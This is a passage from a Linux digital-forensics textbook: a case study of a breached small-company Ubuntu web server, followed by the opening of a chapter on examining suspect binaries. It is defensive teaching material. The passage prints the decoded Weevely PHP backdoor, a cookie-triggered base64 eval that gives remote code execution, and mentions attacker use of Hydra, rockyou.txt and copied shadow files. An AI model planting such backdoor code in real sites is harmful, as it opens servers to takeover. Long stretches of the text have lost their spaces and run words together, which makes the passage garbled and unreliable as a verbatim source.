looklikewhentheattackerhastoworkalittleharder?Thatisthesubjectofthischapter.

THESCENARIOYou received a call from a new client, Phil’s Awesome Stuff (PAS). PAS is a smallcompanythatsellselectronickitsandotherfunitemstocustomersthatliketoplaywithnewtechnology.TheirCEO,Dr.PhilPotslar,hascalledyoubecause thewebmasterhasreportedthatthewebserverisactingstrangely.Asluckwouldhaveit,PASisalsorunningUbuntu14.04.

After interviewing Phil and thewebmaster, you discover that neither of them knowsmuch aboutLinux.Thewebmaster has only recently begun usingLinux after droppingInternetInformationServices(IIS)asawebserveruponlearninghowinsecureitwasataconference.ThecurrentsystemhasbeenupfortwomonthsandisbuiltonApache2andMySQL.ThewebsoftwareiswritteninPHP.Thehardwarewaspurchasedfromalocalcomputer shop two years ago and originally ran Windows 7 before being wiped andupgradedtoUbuntu.

Thewebmasterreports that thesystemseemssluggish.A“SystemProblemDetected”warning message also seems to be popping up frequently. Having completed yourinterviews. you are now ready to begin a limited live response in order to determine iftherehasbeenabreach.BeforetravelingtoPAS,youwalkedthewebmasterthroughtheprocessof installingsnortanddoingabasicpacketcapture fora littlewhile inorder tohavesomeadditionaldatatoanalyzeuponyourarrival.

INITIALLIVERESPONSEUponarrivingatPAS,youplugyourforensicsworkstationintothenetworkandstartyournetcatlistenersasshowninFigure9.1.Thenyouplugyourresponseflashdriveintothesubject machine, load known-good binaries, and execute the initial-scan.sh script asshowninFigure9.2.

FIGURE9.1

Startingacaseonforensicsworkstation.

FIGURE9.2

Loadingknown-goodbinariesandperformingtheinitialscanonthesubject.

Uponexamining the log filegeneratedby initial-scan.sh, itquicklybecomesapparentthatsomethingisamiss.Oneofthefirstthingsyounoticeisthatashellislisteningonport44965,asshowninFigure9.3.Usingnetcat,youperformaquickbannergrabonthisportandfindthatitreportsitselfasSSH-2.0-WinSSHD,asshowninFigure9.4.Afterdoing

someresearch,youdiscoverthatthisisadropbearSSHbackdoor.YouattempttoSSHtothismachinewhichconfirmsyoursuspicions(thisisalsoshowninFigure9.4).

FIGURE9.3

Partoftheinitial-scanlogfile.Highlightedportionshowsashellthatislisteningonport44965.

FIGURE9.4

BannergrabandSSHloginattemptthatconfirmtheexistenceofadropbearSSHbackdooronport44965.

Sofarweknowthat somethinghashappened,becauseabackdoorhasbeen installed.ExaminationoffailedloginattemptsrevealsalonglistoffailedattemptsforthejohnuserviaSSHonMay3at23:07.ThisisshowninFigure9.5.Itisnotyetcleariftheseattemptsoccurredbeforeorafterthebackdoorwasinstalled.

FIGURE9.5

Alargenumberoffailedloginattemptswithinthesameminute.

Further analysis of the initial-scan.sh log reveals a new user, mysqll, with a homedirectoryof /usr/local/mysqlhasbeencreated.Furthermore, theuser IDhasbeen set tozero,whichgivesthisnewuserrootaccess.TherelevantpartofthelogisshowninFigure9.6.

FIGURE9.6

Evidenceofabogususerwithrootaccess.

YougiveDr.Potslar thebadnews, thathiswebserverhas in factbeencompromised.Whenhehears of the backdoor, hemakes the decision to replace thewebserverwith anewmachine(itwas timeforanupgradeanyway).Anewmachine ispurchasedfromalocal store, and a friend of yours helps PAS install a fresh version of Ubuntu on themachine, install and configure Snort, set up a webserver with fresh code from thewebmaster’s code repository, replicate the MySQL database from the webserver, andswitchitoutfortheexistingserver.Yourfriendworkscloselywiththewebmastersothathecanperformthisprocessunassistedshouldthenewserverbecomere-infected.

Yourworkisfarfromover.Atthispointyouknowthatthemachinewascompromisedbutnothowandwhy.Oncethenewserverisinplaceandverifiedtobeworkingproperly,you use LiME to extract amemory image and then shut down the subjectmachine bypulling the plug. According to your initial-scan.sh log, themachine is running Ubuntu14.04 with a 3.16.0-30 kernel. As you already have a LiME module for this exactconfiguration, dumping the RAM was as simple as running sudo insmod lime-3.16-0-30-generic.ko “path=tcp:8888 format=lime” on the subjectsystem, and then running nc 192.168.56.101 8888 > ram.lime on theforensicsworkstation.

YoupulltheharddrivefromthesubjectcomputerandplaceitintoyourUSB3.0drivedock.Using theudevrules-basedwriteblocking,asdescribed inChapter4,anddcfldd,youcreateaforensicimageoftheharddrivewhichyoustoreonaportable6TBUSB3.0drivewithalloftheotherdatarelatedtothiscase.Eventhoughthechancesoffindingaremote attacker are slight, you still need to figure out what happened to prevent arecurrence.Also,wehavenotyetperformedenoughanalysis toruleoutan insiderwho

could be prosecuted or subject to a civil lawsuit. It never hurts to be able to prove theintegrityofyourevidence.

MEMORYANALYSISYoudecide to startwithmemory analysis in hopes that itwill guide you to the correctplaces during your filesystem analysis.As always, there is nothing that stops you fromswitchingbackandforthbetweenmemoryanalysisandfilesystemanalysis.Asbefore,wedefineanaliasforVolatilityinthe.bashrcfileasshowninFigure9.7.

FIGURE9.7

Addinganaliasto.bashrctomoreeasilyrunVolatility.

PartialresultsfromtheVolatilitylinux_pslistcommandareshowninFigure9.8.FromtheseresultsweseethatthissystemalsohastheXingYiQuanrootkit.Thein.ftpdprocessbeingrunwithaninvaliduserIDof4294936576inthelastlineofFigure9.8alsolooksabitsuspicious.

FIGURE9.8

Partial results from running the Volatility linux_pslist command against the PAS subject system. Thehighlightedportionshowsarootkitprocess.ThelastprocesslistedalsohasasuspicioususerID.

RunningtheVolatilitylinux_psauxcommandprovidessomemoredetailonwhatishappening.AscanbeseeninFigure9.9,inprocess8019theuserwithID1001changedto the bogusmysqll userwith the commandsumysqll. This generated a bash shellwith root privileges because mysqll has a user ID of zero (process 8021). Thexingyi_bindshell is runningwith rootprivileges inprocess8540.The rootkitwas likelystartedfromtheshellinprocess8021.Thiscanbeverifiedbyrunninglinux_pstree.

FIGURE9.9

Partial results from running the Volatility linux_psaux command against the PAS subject system. Thehighlightedportionshowsmaliciousactivity.

WenoticedadropbearSSHbackdoorlisteningonport44965.WecanusetheVolatilitylinux_netstatcommandandpipetheresultstogrepTCP todiscovertheprocessIDforthisprocess.PartialresultsfromthiscommandareshowninFigure9.10.FromtheresultsweseethatthedropbearprocessIDis1284.Thislowprocessnumbersuggeststhatdropbear has been set to automatically start. Thelinux_pstree results support thisinference.Furthermore,thelinux_pstreeresultsrevealthattherootshellinprocess9210waslaunchedbyxingyi_bindshellrunninginprocess8540.

FIGURE9.10

PartialresultsfromrunningtheVolatility linux_netstatcommandagainstthePASsubjectsystemandpipingtheoutputto“grepTCP”.

The process maps for the two suspicious processes are captured with thelinux_proc_maps command as shown in Figure 9.11. The process spaces for bothprogramsarealsodumpedtodiskforlateranalysisasshowninFigure9.12.

FIGURE9.11

Savingprocessmapsforsuspiciousprocesses.

FIGURE9.12

Savingprocessmemoryforsuspiciousprocesses.

Thelinux_bash command produces some very enlightening results. As shown inFigure 9.13 and Figure 9.14, the attacker is actively trying to become more deeplyembeddedinthesystem.Alotofmaliciousactivitywasrecordedinthebashhistoryforprocess9210.Theresultsfromlinux_pslistconfirmthatthisisarootshell.Figure9.13showstheattackerdownloadingandinstallingtheWeevelyPHPbackdoor.Later,inFigure9.14,theattackercanbeseendownloadingtherockyou.txtpasswordlistandthenperforminganonlinepasswordattackagainstthesueuseraccountwithHydra.

FIGURE9.13

Downloadingandinstallingarootkit.

FIGURE9.14

OnlinepasswordcrackingwithHydra.

Hydra was used against the local FTP server. Before launching Hydra, the attackercopied both the /etc/passwd and /etc/shadow files. It isn’t clear why Hydra was used,insteadof an offline password cracker like John theRipper. Perhaps the attacker didn’t

want tocopyoff thepasswdandshadowfiles.Using the localFTPserver forpasswordcrackingissomewhatfastandmaynotgeneratealertsifaninstalledIntrusionDetectionSystem(IDS)isn’tconfiguredtomonitorthistraffic.

Thelinux_psenv command run against processes 8540, 1284, and 9210 producesinterestingresults.SomeoftheresultsareshowninFigure9.15.Thehighlightedportionshows that a hidden directory /usr/mysql/.hacked has been created. The processenvironmentforthedropbearbackdoorconfirmsthatthisprogramisautomaticallystartedwhenthesystembootstorunlevel2orhigher.

FIGURE9.15

Partial results from running the Volatility linux_psenv command against suspicious processes on the PASsubjectsystem.

The entire suite of Volatility linux_check_xxxx commands was run against thePASsubjectsystem.Onlythelinux_check_syscallcommandreturnedanyresults.SomeoftheseresultsaredisplayedinFigure9.16.FromtheresultswecanseethatXingYi Quan has hooked the 64-bit system calls for open, lstat, dup, kill, getdents, chdir,rename, rmdir, andunlinkat.Whenviewedwith the completeoutput for this command,the addresses for hooked system calls are noticeably different from the unaltered callhandlers.

FIGURE9.16

PartialresultsfromtheVolatilitylinux_check_syscallcommandrunagainstthePASsubjectsystem.

The Volatility linux_enumerate_files command was run against the PASsubject system and the resultswere saved to a file. Egrepwas then used on the file tolocatecertainfilesinthefilesystemcache.ThepartialresultsshowninFigure9.17revealthat the rockyou.txt password list and the XingYi Quan rootkit are both stored in thehiddendirectory/usr/local/mysql/.hacked.

FIGURE9.17

Maliciousfilesstoredinahiddendirectory.

WhileVolatility could be used to retrieve some files from the file cache, it is likelyeasiertojustusethefilesystemimageforthispurpose.Ifthereisaneedtoretrievemoreinformationfromthememoryimage,thememoryimageisnotgoinganywhere.WemightreturntousingVolatilitywhenperformingmalwareanalysis.

FILESYSTEMANALYSISAtthispoint,weknowthereareatleasttwopiecesofmalwarethatwerelikelyinstalledaround May 4, based on the bash histories. We also know that a new user withadministrative privileges was created and that the attacker has attempted to crackadditionalpasswordsonthesystem.Whatwedonotknowyetiswhentheinitialbreachoccurredandhow.

Using our Python scripts from Chapter 5, the disk image is easily mounted on theforensicsworkstation.Oncethisisaccomplished,runninggrep1001onthepasswdfilerevealsthatuserID1001,whichwasusedtolaunchoneoftherootshells,belongstothemichaeluser,whoserealnameisMichaelKeaton.

Because the system was running a webserver, and the Weevely PHP backdoor wasinstalled,itmakessensetohavealookatthewebserverlogsforsomepossibleinsightintohow the breach occurred.We do not know at this point if the breachwas caused by aproblemwiththewebsite,butitiscertainlyworthcheckingout.

TheApachewebserverlogscanbefoundin/var/log/apache2.Thetwoprimarylogfilesare access.log and error.logwhich store requests and errors, respectively.Both of theselogs have the standard numbered archives. After examining the access logs, it isdiscoveredthatararelyused,obscurepage,calleddns-lookup.php,iscalled51timeslateonMay3.Alookattheerrorlogsreveals19errorsloggedaboutthesametime.SomeoftheseresultsareshowninFigure9.18.

FIGURE9.18

Evidenceofanattackonthewebserver.

Examinationof theMySQLlogs found in /var/log/mysqlcovering thesameperiodoftime reveals that theycontainmultiple errors.Thezcat commandwasused to cat thecompressedlogfiles,whichwerethenpipedtoegrep.Thecompletecommandusedwaszcat error.log.2.gz | egrep ’(^150503)|(ERROR)’. The regularexpression in the egrep command displays only lines that beginwith the date code forMay 3 or that contain an error. Partial results from this command are shown in Figure9.19.

FIGURE9.19

MySQLerrorsindicatingapossiblewebsiteattack.

Memoryanalysisrevealedtheexistenceofahiddendirectory/usr/local/mysql/.hacked.Issuing the command ls -al from the /usr/local/mysql directory reveals severalinteresting things.There is anotherhiddendirectory, /usr/local/mysql/.weevely, thatwascreatedshortlyafterthesuspiciouswebactivityoccurredonMay3.Immediatelyafterthewebserver attack, .bashrc and .bash_logout files were created in the /usr/local/mysqldirectory.A.bash_historyfileinthesamedirectoryrevealstheinstallationoftheweevelybackdoorwithapasswordof“hacked”.TheseresultsaredisplayedinFigure9.20.

FIGURE9.20

EvidenceoftheinstallationoftheweevelyPHPSSHbackdoor.

LEVERAGINGMYSQLThe picture ofwhat happened to the PASwebserver is starting to become pretty clear.Becauseitliterallyonlytakesacoupleofminutes,themetadataisimportedintoMySQLusingthetechniquesdiscussedinChapter6.Onceeverythingisloadedinthedatabase,atimeline from May 3 onward is easily created. The timeline shows intense webserveractivityatapproximately22:50onthe3rdofMay.Furtheranalysisrevealschangesinthe/usr/local/mysql/.weevely directory at 23:53 and the creation of a new file,/var/www/html/index3.php.AportionofthetimelineisshowninFigure9.21.

FIGURE9.21

Portion of the PAS subject system timeline. The highlighted portion shows new files associated withbackdoors.

Theindex3.phpfile isshowninFigure9.22.Thisissomeobfuscatedcodecreatedbytheweevelybackdoor.Thiscodebothinsertsextracharactersandusesbase64encodingtohidewhatitdoes.$khbecomes“str_replace”,$hbhequals“base64_decode”,and$kmisset to “create_function”. This makes the last line $go = create_function(‘’,base64_decode(str_replace(“q”, “”, $iy.$gn.$mom.$scv))); $go();. Parsing all of thisthroughanonlinebase64decoderproducesthefollowing:

$c=’count’;$a=$_COOKIE;if(reset($a)==’ha’ && $c($a)>3){ini_set(‘error_log’,‘/dev/null’);$k=’cked’;echo

‘<’.$k.’>’;eval(base64_decode(preg_replace(array(‘/[^\w=\s]/’,’/\s/’), array(‘’,’+’),join(array_slice($a,$c($a)-3)))));echo‘</’.$k.’>’;}

FIGURE9.22

ObfuscatedPHPcodefromtheweevelyPHPSSHbackdoor.

Ifyoulookcloselyenough,youwillseetheweevelypassword“hacked”isembeddedinthiscode,whichisalsoobfuscated.

FurtheranalysisofthetimerevealsthatHydrawasrunafewtimesonthe4thofMay.Some of the packet captures created by thewebmaster, after a problemwas suspected,were also analyzed. There seems to have been a test of the dropbear backdoor on port44965 in thiscapture,butmost trafficseems tobecomingdirectlyonport22.SomeofthistrafficisshowninFigure9.23.

FIGURE9.23

SomeofthetrafficcapturedfromthePASsubjectsystem.Thebottomfourpacketsappeartobeatestofthedropbearbackdoor.TheremainingpacketsinthiscaptureareonthenormalSSHport22.

Partial results from running the query select * from logins order bystart; are shown in Figure 9.24. The highlighted entries are around the time of thebreach.AcompleteanalysisofthisinformationrevealsthatonlyJohnandMichaelhavebeen logging on to the system. This indicates that either John’s password has beencompromisedorthattheattackerisnotloggingindirectly.Theotherevidencegatheredsofarpointstothelatter.

FIGURE9.24

LogininformationfromthePASsubjectsystem.

Runningthisqueryoffailedloginsselect*fromlogin_failsorderbystart;paintsadifferentpicture.ThereisalongstringoffailedloginattemptsforJohnupuntil23:07:54on the3rdofMay.Whencombinedwitha successful remote loginbyJohnat23:10:11thatday,itwouldappearthatJohn’saccounthasbeencompromised.Thefailed logins are shown in Figure 9.25. At this stage it would appear that the initialcompromisewastheresultofawebservervulnerability.Oncetheattackerhadhisorherfootinthedoor,additionalattackswereperformedresultinginatleastonecompromisedpassword.

FIGURE9.25

Failedloginattempts.Thefailedattemptshappenrepeatedlyuntil23:07:54.ConsultationwiththeinformationfromFigure9.24indicatesthatthepasswordwascompromised.

Whilethebashhistoryfrom.bash_historyfilesdoesn’thavetimestamps,likethehistoryfromVolatility, it can still provide useful information.As shown inFigure 9.26, John’saccountwas used to download and install two additional rootkits, thatwe have not yetdiscovered.ThefirstoneisawebshellcalledPoison,thatwasinstalledonthewebserverasindex2.php.ThesecondoneiscalledRK.

FIGURE9.26

Evidenceoftheinstallationoftwoadditionalrootkits.

AlistingofPHPfilesinthedocumentrootandthestartoftheindex2.phpfileareshownin Figure 9.27. The index2.php claims to be the Poison Shell 1.0 byDoddyHackman.Noticethatthetimestamponindex2.phpisfrom2013,unlikesomeoftheotherpiecesofmalwarediscoveredsofarthatdidn’talterthetimestamps.

FIGURE9.27

EvidencethatthePoisonShell1.0hasbeeninstalledonthesubjectsystem.

Weseeahiddendirectorycalled“.rk”thatisusedtostoretheRKrootkit.Becausewehave the subject’s filesystem mounted, we can use the command find <mountpoint> -type d -name ’.*’ to locate all hidden directories. The results ofrunningthiscommandagainstthePASsubjectsystemareshowninFigure9.28.Notethatthe“.rk”directoryisnotlisted.Thisdirectorymusthavebeendeletedlater.Furthermore,nonewsuspiciousdirectoriesarefound.

FIGURE9.28

HiddendirectoriesonthePASsubjectsystem.

MISCELLANEOUSFINDINGSRunning the out-of-sequence-inodes.sh script from Chapter 7 on the /sbin directoryrevealed nothing interesting. As with our first case, running this script on the /bindirectory allows the Xing Yi Quan rootkit to be easily seen. Partial output from thiscommandisshowninFigure9.29.

FIGURE9.29

Outofsequenceinodesforarecentlyaddedrootkit.

AfteryouinformDr.Potslaroftheexcessiverequestsfordns-lookup.phponMay3,hepasses this information along to thewebmaster. Thewebmaster then has a look at thiscode with the help of a friend from the local OpenWeb Application Security Project(OWASP) chapter which he has recently joined. They discover a code executionvulnerabilityonthispage.

SUMMARYOFFINDINGSANDNEXTSTEPSYouarenowreadytowriteupyourreportforPAS.Yourreportshouldnormallyincludeanexecutivesummaryoflessthanapage,narrativethatisfreeofunexplainedtechnicaljargon, and concrete recommendations andnext steps (possiblywithpriority levels if itmakessense).Anyrawtooloutputsshouldbe includedinanappendixorappendicesattheendof the report, ifatall. Itmightmakesense toburnallof this toaDVD,whichincludestooloutputsandyourdatabasefiles.

Whatshouldyoudowiththesubjectharddriveandyourimage?Thatdependsonthesituation. In thiscase there isvery littlechanceofever finding theattacker.Even if theattacker were found, he or she would quite possibly in a jurisdiction that wouldmakeprosecution difficult or impossible. If this is not the case, a lawsuit might be a badbusiness decision given the costs involved (both money and time). No customerinformation is stored on the PAS subjectmachine. The vastmajority of the company’ssalesoccuratvariousconferencesand tradeshows.Customerswanting tobuyproductsfromthewebsitearedirectedtocallore-mailthecompany.Givenallofthis,youmightaswell return the hard drive to the company. The image can be retained for a reasonabletime,withthecostofthebackupdrivecontainingtheimageandallothercase-relatedfilesincludedonyourbilltoPAS.

Summaryoffindings:

OntheeveningofMay3,anattackerexploitedavulnerabilityinthedns-lookup.phpfileonthewebserver.Theattackerlikelyusedtheaccessgainedtogatherinformationaboutthesystem.Thedetailsofwhatheorshedidarenotavailablebecauseparameterssenttowebpagesarenotrecordedinthelogs.After repeated failed SSH login attempts using John’s account shortly after the breach (many of whichoccurred in thesameminute), theattackersuccessfully logged inusingJohn’saccount.Anonlinepasswordcracker,suchasHydra,waslikelyused.ThefactthatattackerwassuccessfulsoquicklysuggestthatJohnhasaweakpassword.Theattackerinstalledatleastthreerootkitsorbackdoorsonthesystem.Thereisevidencetosuggestthattheattackerattemptedtocrackotherpasswords.Michael’saccountwasusedononeoccasionwhichsuggestshispasswordmayhavebeencracked.AcommandtocrackSue’spasswordwasfoundinhistoryfiles.Itisunknowniftheattackagainstherpasswordwassuccessfulasheraccounthasneverbeenusedtologintothismachine.TheattackerseemstohaveprimarilyworkedviausingSSHtoremotelyloginwithJohn’saccount,whichhasadministrativeprivileges.Theattackercreatedabogusaccountwithausernameofmysqll.Thisaccounthadadministrativeprivileges.OnoneoccasiontheattackerloggedinremotelyasMichaelandthenswitchedtothemysqllaccount.

Recommendations:

Urgent:Fixthevulnerabilityindns-lookup.phpUrgent:All usersmust change passwords to something secure. It is recommended that new passwords areverifiedtonotbeintherockyou.txtpasswordlist.Important: Examine the entire website for other vulnerabilities. It is recommended that all items on theOWASPTop10 list (https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project)becheckedat aminimum.Recommended:InstallSnortorotherIntrusionDetectionSystemonthenewwebserver.Recommended:Supportthewebmasterinhiseffortstolearnmoreaboutwebsitesecurity.Recommended:Limitaccountsonthewebservertothebareminimum.Severalaccountsonthisserverappeartobeunused(i.e.Sue’saccountwhichwastargetedbytheattacker).Recommended: Periodic review of logswith emphasis on theApache andMySQL logs. The initial breachmighthavebeendetectedbysuchareview.Recommended: Periodic penetration tests should be performed. If hiring a penetration tester is noteconomicallyfeasible,ataminimum,thewebmasterorotherPASemployeeshouldbecomefamiliarwithanduseseveralwebvulnerabilityscanners.

SUMMARYInthischapterwewalkedthroughanattackthatwasslightlymoresophisticatedthanthePFE attack discussed earlier in this book.We found that the same techniques could beemployed,regardlessofthesophisticationleveloftheattacker.Gettingthefullpictureoftheattacker’sactions required theuseof liveanalysis,memoryanalysis, and filesystemanalysis.Wewereable to research themalware installed todiscover its functionality. Inthenextchapter,wewilldiscusshowtoanalyzeunknownexecutables.Ourconversationwillincludedeterminingifunknownfilesareactuallymalware.

CHAPTER

10MalwareINFORMATIONINTHISCHAPTER:

ThefilecommandUsinghashdatabasestoidentifymalwareUsingstringstogathercluesThenmcommandThelddcommandUsingreadelftogetthebigpictureUsingobjdumpfordisassemblyUsingstracetotracksystemcallsUsingltracetotracklibrarycallsUsingtheGNUDebuggerObfuscationtechniques

ISITMALWARE?You’vediscoveredafileleftbyanattackeronthesubjectsystem.Naturally,youwanttoknowifitissomesortofmalware.Thefirstthingyouwanttodoisclassifythefile.Isitanexecutableorsomesortofdatafile?Ifitisexecutable,whatdoesitdo?Whatlibrariesdoesituse?Doesitconnecttotheattackeracrossthenetwork?

While this isnotabookon reverseengineeringLinuxmalware, the information fromthis chapter should be sufficient for you to distinguish malware from benign files andgleanahigh-levelunderstandingofwhattypesoffunctionsmalwareperforms.Fromyourclient’s perspective, they do not care what the malware does or how many clevertechniqueswereusedbytheprogrammer.Theirbiggestconcerniswhatinformationmayhavebeencompromisedastheresultofthemalware.Thisshouldbeyourbiggestconcernaswell.Insomecases,youmayneedtodosomeinvestigationofthemalwaretohelpyoudeterminetheextentofthedamage.

ThefilecommandUnlikeWindows,whichstupidlyusesfileextensionstodeterminefiletype,Linuxissmartenough to determine what a file is by looking at its file signature. The Linux filecommand is used to display the file type to the user. The file command goes waybeyondprovidinginformationonafile’sextension.

The results of runningfile on some of the files associatedwith theXingYiQuan

rootkitfromthePASsubjectsystemareshowninFigure10.1.Noticethatfileisabletodistinguish between the install, README, and xingyi_addr.c files, which are anexecutablePerlscriptinASCIItext,aplainASCIItextfile,andaCsourcefileinASCIItext, respectively. Compare this to Windows, which cannot distinguish install fromREADME, because there is no file extension (which normally indicates a directory forWindows).

FIGURE10.1

ResultsofrunningthefilecommandonrootkitfilessavedfromthePASsubjectsystem.

Theinformationprovidedforbinaryfiles ismuchmorespecific.Hereweseethat thebinaries are 64-bit Executable and Linkable Format (ELF) files for little endian (LSB)systemsbasedontheSystemVbranchofUNIX(Linuxissuchasystem).Theyarealsodynamicallylinked,meaningtheyusesharedlibraries,asopposedtostaticallylinkingallthecodetheyneedintheexecutable(whichwouldmakeithuge).Thefileiscompatiblewithkernelversions2.6.24andhigher.Thefileshavenotbeenstrippedofthedebuggingsymbolinformation.ASecureHashAlgorithm(SHA)hashforeachbinarybuildidentifierisalsogiven.

Asyoucansee,thisonecommandprovidesquiteabitofinformation.Iffiledoesn’tidentifythesuspiciousfileasanexecutablebinaryorascript,itisprobablysomesortofdata file, or a component that was used to build somemalware. For files that are notexecutable, there are ways of telling if executables use a file. These methods will bediscussedlaterinthischapter(althoughtherearealsowaysofobscuringthisfromwould-bereverseengineers).

Isitaknown-badfile?

AnumberoforganizationsmaintaindatabasesofknownmalwareMD5andSHAhashes.Naturally, most of these hashes pertain to Windows, the king of malware, but manydatabases listLinuxmalwareaswell.Someof thesedatabasesmustbedownloadedandothersmustbeaccessedonline.Oneoftheonlinedatabasesthatisaccessibleviamultipleservices is theMalwareHashRegistry (MHR)maintainedbyTeamCymru(http://team-cymru.org/MHR.html).

OneofthenicethingsaboutMHRisthatitusesbothMD5andSHAhashes.TheSHAhashiseasilycalculatedusingsha1sum<filename>.PerhapstheeasiestwaytousetheMHR is via the whois command. The whois service is normally used to lookupinformation on a web domain. The syntax for using this service to check a binary iswhois-hhash.cymru.com<MD5orSHAhash>. If the file is known, theUNIXtimestampforthelastseentime,alongwiththeanti-virusdetectionpercentageisreturned.TheresultsofrunningthiscommandagainstoneoftheXingYiQuanfilesareshowninFigure10.2.

FIGURE10.2

CheckingabinaryhashagainsttheMalwareHashRegistry.

Whydidn’tthisreturnahit?Recallthathashfunctionsaredesignedsuchthatchangingasinglebitradicallychangesthehashvalue.ManypiecesofLinuxmalwarearebuiltonthe victim machine, which makes it easy to hard code values such as passwords andaddresses,whilesimultaneouslychanginganyhashvalues.

TheNationalInstituteofStandardsandTechnology(NIST)maintainsalargedatabaseofhashesknownastheNationalSoftwareReferenceLibrary(NSRL).Atpresentthereareover40millionMD5hashesinthisdatabase.UpdatestoNSRLarereleasedfourtimesayear. In order to avoid the need to download thismassive 6GB database and getmore

frequentupdates,aqueryserverhasbeensetup.

Using the NSRL query server requires the installation of a program known asnsrllookup. This program can be obtained from the following URL on githubhttps://github.com/rjhansen/nsrllookup/archive/v1.2.3.tar.gz.Thisprogramisveryeasytouse. Simply pipe an MD5 hash to it like so, md5sum <suspicious file> |nsrllookup.Ifthehashisunknown,itwillbeechoedbacktoyou.Ifyouprefertoseeonlyknownhashes,addthe-kflag.RunningnsrllookupagainstasetoffilesisshowninFigure10.3.

FIGURE10.3

Runningnsrllookupagainstalistoffiles.NoneofthefilesinthisdirectoryareintheNSRL,ascanbeseenbyrunningnsrllookupwiththe-kswitch.

TheNSRLcontainsknownfiles,bothgoodandbad.Ifyoudogetahit,youwillneedtoget the details from theNSRLwebsite to decide if a file ismalicious or benign.Thesequeries can be performed at http://www.hashsets.com/nsrl/search. An example known-goodLinuxbinaryisshowninFigure10.4.

FIGURE10.4

AnentryintheNSRLReferenceDataSet(RDS)foraknownLinuxbinary.

UsingstringsInmostcasesyourfilewillnotbelistedintheMHRorNSRL.Thesedatabasesarebest

used to whittle down the files to be examined if you have lots of suspect files. Thestrings utilitywill search a binary file forASCII text anddisplaywhatever it finds.Thesyntaxforthecommandisstrings-a<suspiciousfile>.Partialresultsfromrunningthecommandstrings-axingyi_bindshellareshowninFigure10.5.Pathnames to temporaryfilesandwhatcouldbeapasswordarehighlighted in thefigure.

FIGURE10.5

Runningstringsonasuspiciousbinary.

Youmaywanttocapturetheoutputfromstrings toafile.Anystrangeanduniquewords,suchas“sw0rdm4n”and“xingyi”,canbeusedforGooglesearches.Youmayseeseveral strings of the form <function>@@<library> that can tell you what libraryfunctionsarebeingusedinthiscode.Youwillonlyseethesestringsifdebuggingsymbolshave not been removed with strip. The results of running stringsxingyi_bindshell|grep@@|sortareshowninFigure10.6.

FIGURE10.6

Displayinglibraryfunctionswithstrings.Notethatthisonlyworksforbinariesthathaven’tbeenstripped.

ListingsymbolinformationwithnmThenmutilityisusedtolistsymbolsfromanobject(binary)file.Thiscommandproducesalistofsymbolsalongwiththeiraddresses(ifapplicable)andsymboltype.Someofthemore prevalent types are shown in Table 10.1. Generally speaking, lowercase symbolsdenotelocalsymbolsanduppercasesymbolsrepresentexternal(global)scope.Theoutputfrom nm can give some insight into the unknown file, by providing called libraryfunctions,localfunctionnames,andvariablenames.Naturally,ifthesesymbolshavebeenstrippedusingthestripcommand,nmproducesnooutput.Partialoutputfromrunningnmagainstthexingyi_bindshellfileisshowninFigure10.7.Severalsuspiciousfunctionandvariablenamescanbeseeninthefigure.

Table10.1.Commonnmsymboltypes.

Type Description

A Absolute(willnotchange)

B Uninitializeddatasection(BSS)

C Commonsymbol(uninitializeddata)

D Symbolisintheinitializeddatasection

G Symbolisinaninitializeddatasectionforsmallobjects

N Symbolisadebuggingsymbol

R Symbolisinread-onlydatasection

S Symbolisinuninitializeddatasectionforsmallobjects

T Symbolisinthecode(text)section

U Symbolisundefined.Usuallythismeansitisexternal(fromalibrary)

V,W Weaksymbol(canbeoverridden)

? Unknownsymboltype

FIGURE10.7

Partialoutputfromrunningnmagainstxingyi_bindshell.

ListingsharedlibrarieswithlddMostof theprevioussectionscamewith thecaveat that these toolsrelyonbinaries thathaven’t been stripped. Stripping binaries is a commonpractice for a couple of reasons.First, removing the symbols can result in a significantly smaller executable. Second,strippingthefilemakesithardertoreverseengineer(whetherornotitismalware).Whatcanyoudoifthefilehasbeenstripped?

Ifsharedlibrariesareused(whichisalmostcertainlythecase),thentheprogrammustbeable to find them.Also, thenamesofany functionsused in shared librariesmustbesomewhereintheprogram.Thenetofthis,assumingnoobfuscationtechniqueshavebeenemployed,isthatthestringscommandwilltellyouthenamesoffunctionscalledandlddwilltellyousharedlibrariesused.Thenamesofthesharedlibrariescannoteasilybeobfuscatedsincedoingsowouldcause the theprogram’sbuildprocess(specifically, thelaststepcalledlinking)tofail.

The syntax forldd is simplyldd<binary>. The results of runninglddagainstxingyi_bindshellandastrippedcopyofthesameareshowninFigure10.8.Notethattheresultsareidentical.Thefilecommandwasalsorunononeofthesharedlibraries,libc-2.19.so. There are two versions of this library, one with debugging symbols and onewithout.

FIGURE10.8

Runninglddagainstabinaryandthesamebinarythathasbeenstrippedofallsymbols.

ITHINKITISMALWAREIfcheckingafewhashdatabasesandGooglingsomeof thewordsyoufoundinthefileproducesnoresults,itistimetodigdeeperintothefile.Anaturalplacetostartwouldbeexaminingtheoverallfilestructure.Onceyouhaveahigh-levelviewofwhatisgoingon,youcanstartdrillingdownandlookingattheactualcodeifrequired.

GettingthebigpicturewithreadelfLinuxexecutablesare in theExecutableandLinkableFormat (ELF).AnELF file is anobjectfile,whichcanbeviewedintwodifferentways,dependingonwhatyouaretryingto do with it. Figure 10.9 shows the two views and different parts of the file that arerelevanttoeachview.

FIGURE10.9

ThetwoviewsofanELFfile.

AsshowninFigure10.9,allELFfileshaveaheader.Whenthefileisbeingexecuted,the Program Header Table (PHT) that follows the header is read. The PHT describesvarioussegments(largechunks)inthefile.InthelinkingviewthePHTisignoredandtheSection Header Table (SHT) at the end of the file is read. The SHT describes varioussections(whicharesubpartsofsegments)inthefile.

The readelf utility parses different parts of an ELF file. Thanks to this handyprogram, there is littleneed todig into thedetailsof theELFstructures.Thecommandreadelf–file-header<file>willdisplay theheader information.Theresultsof running thiscommandagainstxingyi_bindshell are shown inFigure10.10.From thefigure, we see this is a 64-bit executablewith nine program headers and thirty sectionheaders. All ELF files begin with the “magic number” 0x7F, followed by the string“ELF”,orjust0x7F0x450x4C0x46inhexadecimal.

FIGURE10.10

TheELFheaderinformationforxingyi_bindshell.

Thereadelf–section-headers<file>commandisusedtodisplaysectioninformation. The output from running readelf –section-headers -Wxingyi_bindshell is shown inFigure 10.11.The -Woption specifieswide format(not restricted to80charactersofwidth).The sectionsaredescribed inTable10.2.Thesectionsfromthisfilearefairlytypical.

FIGURE10.11

Sectionsfromthexingyi_bindshellfile.

Table10.2.Sectionsfromxingyi_bindshell.

Name Description

Null

.interp Dynamiclinkername

.note.ABI-tag Notecontaining“GNU”followedbyarchitectureinformation

